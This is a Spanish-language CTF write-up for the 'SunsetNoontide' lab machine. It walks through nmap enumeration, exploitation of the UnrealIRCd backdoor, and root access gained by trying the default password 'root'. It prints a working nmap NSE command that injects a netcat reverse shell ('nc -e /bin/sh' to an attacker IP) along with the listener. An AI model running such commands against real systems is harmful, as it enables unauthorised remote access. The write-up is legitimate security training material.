🟢SunsetNoontide

Enumeración

NMAP

Comenzamos realizando un escaneo rápido de los puertos que tiene abiertos la máquina víctima.

nmap -p- --open -vvv -Pn -n --min-rate 2000 192.168.130.120

Existen 3 puertos abiertos en el equipo target.

• Puerto 6667 -> irc

• Puerto 6697 -> ircs-u

• Puerto 8067

Realizamos un escaneo en profundidad de los servicios abiertos.

nmap -p6667,6697,8067 -sVC -vv -Pn -n 192.168.130.120 -oN target

Tenemos tres servicios IRC. Existe un script NSE irc-unrealircd-backdoor en Nmap, vamos a probarlo.

Explotación

Utilizando script de NMAP

El argumento del script irc-unrealircd-backdoor.command se puede utilizar para ejecutar un comando arbitrario en el sistema remoto. También ejecutamos un oyente con nc en nuestra máquina de ataque.

Ejecutamos nmap de la siguiente manera para ejecutar comandos arbitrarios en la máquina víctima.

nmap -d -p6697 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='nc -e /bin/sh 192.168.49.130 4444' 192.168.130.120

Y por otro lado, un oyente nc.

nc -nlvp 4444

Después de ejecutar NMAP, obtenemos conexión reversa y acceso a la máquina víctima.

El siguiente paso será buscar la flag local.txt. Esta se encuentra en el directorio home/server.

Utilizando Metasploit

Anteriormente, durante el escaneo de servicios abiertos, descubrimos que se está ejecutando UnrealIRC en el equipo de la víctima. Vamos a ver que versión. Para ello, vamos a utilizar el script irssi.

Instalamos irssi

apt install irssi

Posteriormente, lo ejecutamos.

irssi

Debemos introducir la IP del equipo target.

Con esta versión y utilizando searchsploit, vamos a buscar versiones vulnerables para esta versión.

Ejecutamos msfconsole.

• Paso 1. Buscar el exploit

• Seleccionar el exploit

• Configuramos el exploit

• Ejecutar el exploit

Y volveriamos a tener conexión con la máquina objetivo. Solo habría que buscar la flag.

Utilizando un exploit en Python

Para ello, utilizaremos este exploit.

El primer paso será configurar el exploit.

Y ejecutamos.

Al mismo tiempo debemos colocar un oyente en el puerto configurado en el exploit.

Y volveriamos a tener conexión a la máquina víctima.

Elevación de privilegios

Ingrese el siguiente comando para obtener un shell interactivo

python3 -c 'import pty;pty.spawn("/bin/bash")'

Realizamos una comprobación de contraseñas por defecto para usuario root. Ingresamos su root y como password root también (contraseña débil para usuario root)

Ya tenemos privilegios máximos en la máquina. El paso final, será buscar la flag.

Ya tenemos acabado el CTF.